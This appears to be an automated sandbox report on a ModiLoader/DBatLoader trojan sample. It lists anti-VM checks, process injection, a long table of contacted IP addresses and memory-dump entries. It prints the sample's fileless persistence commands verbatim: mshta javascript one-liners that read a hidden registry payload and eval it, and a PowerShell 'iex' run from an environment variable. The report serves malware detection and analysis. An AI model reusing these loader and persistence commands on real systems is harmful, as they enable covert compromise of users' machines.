Malware Analysis Report

2024-08-06 14:38

Sample ID 240522-3rs3yadf3x
Target 690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118
SHA256 1a7850cb9fd09e203b213de0cf4a44653c9cb30f441d058e7ed098c7b9d932b3
Tags
modiloader evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1a7850cb9fd09e203b213de0cf4a44653c9cb30f441d058e7ed098c7b9d932b3

Threat Level: Known bad

The file 690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

modiloader evasion persistence trojan

ModiLoader, DBatLoader

Process spawned unexpected child process

Looks for VirtualBox drivers on disk

Checks for common network interception software

ModiLoader Second Stage

Looks for VirtualBox Guest Additions in registry

Looks for VMWare Tools registry key

Checks computer location settings

Drops startup file

Checks BIOS information in registry

Deletes itself

Maps connected drives based on registry

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Enumerates physical storage devices

Unsigned PE

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Modifies registry class

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-05-22 23:45

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-22 23:45

Reported

2024-05-22 23:47

Platform

win7-20240221-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VirtualBox drivers on disk

evasion
Description Indicator Process Target
File opened (read-only) C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sys C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e795bdc5.lnk C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:g2A8seJw=\"waBZ5TZ\";z99m=new%20ActiveXObject(\"WScript.Shell\");vruE0A5=\"uQr1NHM\";rcvh47=z99m.RegRead(\"HKCU\\\\software\\\\pzadcohmp\\\\jhpvhyp\");DzKpl4fC=\"7TbkBe6c\";eval(rcvh47);qBz1kE=\"cwBiEG\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Users\\Admin\\AppData\\Local\\d3afae00\\9a86c6c3.lnk\"" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "\"C:\\Windows\\system32\\mshta.exe\" javascript:VCReAR6=\"BgKLGg\";yN1=new%20ActiveXObject(\"WScript.Shell\");bxa1z3=\"VXI\";fPx2j=yN1.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\pzadcohmp\\\\jhpvhyp\");H9d7cp=\"Af2C7Z\";eval(fPx2j);vruN51=\"1w\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\.73caeeca8 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\.73caeeca8\ = "379d11eb" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\379d11eb C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\379d11eb\shell C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\379d11eb\shell\open C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\379d11eb\shell\open\command C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000_CLASSES\379d11eb\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:BHYy2HsV=\"cqW\";hs5=new ActiveXObject(\"WScript.Shell\");mAt6V=\"1EF70K\";d98rJk=hs5.RegRead(\"HKCU\\\\software\\\\pzadcohmp\\\\jhpvhyp\");XRkgk0K=\"qaD\";eval(d98rJk);N2exPB8Gb=\"7lHN\";\"" C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2220 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe
PID 2220 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe
PID 2220 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe
PID 2220 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe
PID 2220 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe
PID 2220 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe
PID 2220 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe
PID 2220 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe
PID 2220 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe
PID 2220 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe
PID 2220 wrote to memory of 2332 N/A C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe
PID 2884 wrote to memory of 1764 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2884 wrote to memory of 1764 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2884 wrote to memory of 1764 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2884 wrote to memory of 1764 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1764 wrote to memory of 2132 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1764 wrote to memory of 2132 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1764 wrote to memory of 2132 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1764 wrote to memory of 2132 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1764 wrote to memory of 2132 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1764 wrote to memory of 2132 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1764 wrote to memory of 2132 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1764 wrote to memory of 2132 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2132 wrote to memory of 1720 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2132 wrote to memory of 1720 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2132 wrote to memory of 1720 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2132 wrote to memory of 1720 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2132 wrote to memory of 1720 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2132 wrote to memory of 1720 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2132 wrote to memory of 1720 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2132 wrote to memory of 1720 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\690a11b0992482f1c5a65be3f37d15d4_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:ibDv7z2="cNpPdg";G7R=new%20ActiveXObject("WScript.Shell");IuB9ZW5="yd8xZSb";Kak1h=G7R.RegRead("HKLM\\software\\Wow6432Node\\bCvsVpk\\ih0Ynr1DLV");nd1SqRgn="3dT";eval(Kak1h);Jko2El="f";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:peepj

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network

Country Destination Domain Proto
US 161.164.210.117:80 tcp
HK 210.3.45.60:80 tcp
SA 188.139.55.211:80 tcp
US 135.241.234.127:80 tcp
US 130.169.195.193:80 tcp
JP 60.129.215.68:80 tcp
HU 5.187.239.251:80 tcp
PL 80.53.182.54:443 tcp
US 152.46.172.103:80 tcp
US 209.136.131.62:80 tcp
CN 27.184.11.27:80 tcp
US 48.189.10.154:8080 tcp
US 148.51.192.196:80 tcp
HK 218.191.8.5:80 tcp
CH 81.92.98.168:80 tcp
US 135.224.164.8:443 tcp
US 75.90.228.33:80 tcp
BR 187.68.103.204:80 tcp
PT 2.80.105.188:80 tcp
DE 31.228.183.67:80 tcp
US 29.44.232.77:80 tcp
JP 219.212.176.254:80 tcp
JP 27.134.95.67:80 tcp
US 159.187.146.247:80 tcp
CN 61.162.162.26:80 tcp
US 143.139.7.193:80 tcp
GB 81.154.83.59:80 tcp
US 170.57.207.251:80 tcp
FI 91.157.21.47:443 tcp
PL 46.77.255.47:8080 tcp
US 52.250.50.12:443 tcp
US 33.157.50.41:80 tcp
IN 14.98.146.23:80 tcp
US 94.74.147.178:8080 tcp
US 24.104.91.64:80 tcp
US 155.177.254.117:8080 tcp
US 56.33.245.42:80 tcp
US 107.208.143.9:80 tcp
US 158.72.118.107:80 tcp
US 135.44.8.69:80 tcp
FR 82.142.12.28:80 tcp
US 208.132.154.98:80 tcp
US 208.138.133.178:80 tcp
US 146.151.76.123:80 tcp
GB 25.196.116.226:443 tcp
US 76.117.156.208:80 tcp
BR 179.84.155.177:80 tcp
US 69.215.57.167:80 tcp
UA 178.136.193.13:80 tcp
US 104.21.147.82:80 tcp
US 72.23.2.103:80 tcp
CN 113.205.216.138:80 tcp
CN 61.50.22.93:80 tcp
DE 146.234.24.82:443 tcp
US 75.14.83.112:8080 tcp
CN 39.187.87.97:443 tcp
NL 145.168.82.180:80 tcp
US 168.105.131.161:443 tcp
US 52.7.187.93:80 tcp
US 74.60.250.140:80 tcp
US 52.7.187.93:80 52.7.187.93 tcp
US 52.7.187.93:443 tcp
SE 16.171.182.188:80 tcp
US 4.132.130.188:80 tcp
KR 121.66.99.146:80 tcp
US 8.8.8.8:53 ocsp.r2m02.amazontrust.com udp
FR 3.162.33.170:80 ocsp.r2m02.amazontrust.com tcp
GB 86.139.152.229:80 tcp
US 63.3.118.99:80 tcp
US 208.28.27.11:80 tcp
TR 78.188.152.56:443 tcp
US 155.41.100.81:80 tcp
IT 176.201.2.103:80 tcp
US 20.228.114.212:80 tcp
DE 213.72.237.135:80 tcp
N/A 10.220.156.78:443 tcp
NZ 210.7.33.251:80 tcp
US 6.38.6.79:8080 tcp
CN 123.196.251.3:80 tcp
CN 183.19.144.216:80 tcp
BR 189.21.202.171:80 tcp
US 137.181.226.127:80 tcp
JP 163.135.134.126:80 tcp
CN 110.217.178.198:80 tcp
EG 154.129.139.49:80 tcp
CN 175.22.31.65:80 tcp
NI 186.77.205.79:80 tcp
KR 220.117.123.56:80 tcp
US 215.44.40.240:80 tcp
US 71.90.40.253:80 tcp
US 172.147.78.151:8080 tcp
MX 148.221.152.163:8080 tcp
DE 89.182.255.95:80 tcp
GB 31.205.73.189:80 tcp
CN 39.165.144.253:80 tcp
MX 148.220.149.193:80 tcp
US 20.69.171.133:443 tcp
US 96.63.223.57:80 tcp
CN 220.203.110.114:443 tcp
US 71.52.203.63:80 tcp
BE 212.239.182.80:80 tcp
US 128.151.188.112:80 tcp
US 209.119.252.67:80 tcp
US 71.235.214.189:80 tcp
US 138.144.42.247:80 tcp
US 164.238.189.228:80 tcp
VN 116.110.101.199:80 tcp
KR 116.38.93.71:80 tcp
US 216.57.112.9:80 tcp
BR 177.169.103.99:80 tcp
BR 187.59.236.252:8080 tcp
DE 80.190.190.212:80 tcp
GB 185.193.170.103:80 tcp
RU 188.225.26.18:80 tcp
DE 87.169.193.47:80 tcp
GB 82.47.189.51:80 tcp
US 11.56.94.35:80 tcp
US 215.75.240.14:80 tcp
CN 111.54.67.93:8080 tcp
US 56.166.243.6:80 tcp
US 29.159.40.87:80 tcp
MU 41.67.228.51:80 tcp
DE 141.59.98.250:80 tcp
SG 43.22.120.74:80 tcp
CA 142.176.244.170:80 tcp
JP 113.154.27.150:80 tcp
IN 103.178.156.34:80 tcp
US 20.38.226.53:80 tcp
US 29.78.80.153:80 tcp
US 3.93.210.59:80 tcp
EG 197.41.193.152:80 tcp
US 52.7.187.93:443 tcp
GB 92.31.234.60:80 tcp
SE 140.150.109.158:80 tcp
US 98.87.250.234:80 tcp
US 50.47.87.32:80 tcp
NL 134.188.212.134:80 tcp
US 100.233.250.211:80 tcp
NL 145.130.186.203:80 tcp
US 158.74.186.230:80 tcp
US 98.108.141.120:80 tcp
IN 4.240.115.250:80 tcp
DE 217.91.23.97:8080 tcp
TW 221.169.249.198:80 tcp
CA 132.210.103.189:8080 tcp
CN 111.23.122.240:80 tcp
CN 223.76.62.200:80 tcp

Files

memory/2332-2-0x0000000000400000-0x000000000043A000-memory.dmp

memory/2332-5-0x0000000000400000-0x000000000043A000-memory.dmp

memory/2332-4-0x0000000000400000-0x000000000043A000-memory.dmp

memory/2332-10-0x0000000001D80000-0x0000000001E56000-memory.dmp

memory/2332-9-0x0000000001D80000-0x0000000001E56000-memory.dmp

memory/2332-8-0x0000000001D80000-0x0000000001E56000-memory.dmp

memory/2332-7-0x0000000001D80000-0x0000000001E56000-memory.dmp

memory/2332-6-0x0000000001D80000-0x0000000001E56000-memory.dmp

memory/2332-11-0x0000000001D80000-0x0000000001E56000-memory.dmp

memory/2332-12-0x0000000001D80000-0x0000000001E56000-memory.dmp

memory/1764-21-0x00000000061D0000-0x00000000062A6000-memory.dmp

memory/2132-23-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-25-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/1764-26-0x00000000061D0000-0x00000000062A6000-memory.dmp

memory/2132-30-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-32-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-34-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-27-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-29-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-28-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-43-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-31-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-49-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-47-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-61-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-48-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-58-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-57-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-56-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-55-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-54-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-46-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-45-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-44-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-42-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-41-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-40-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-39-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-38-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-37-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-36-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-35-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-33-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/2132-66-0x0000000000170000-0x00000000002B1000-memory.dmp

memory/1720-68-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/1720-67-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/1720-81-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/1720-80-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/1720-79-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/1720-78-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/1720-77-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/1720-76-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/1720-74-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/1720-73-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/1720-72-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/1720-71-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/1720-70-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/1720-69-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/1720-82-0x0000000000090000-0x00000000001D1000-memory.dmp

memory/1720-75-0x0000000000090000-0x00000000001D1000-memory.dmp

C:\Users\Admin\AppData\Local\d3afae00\d2239679.bat

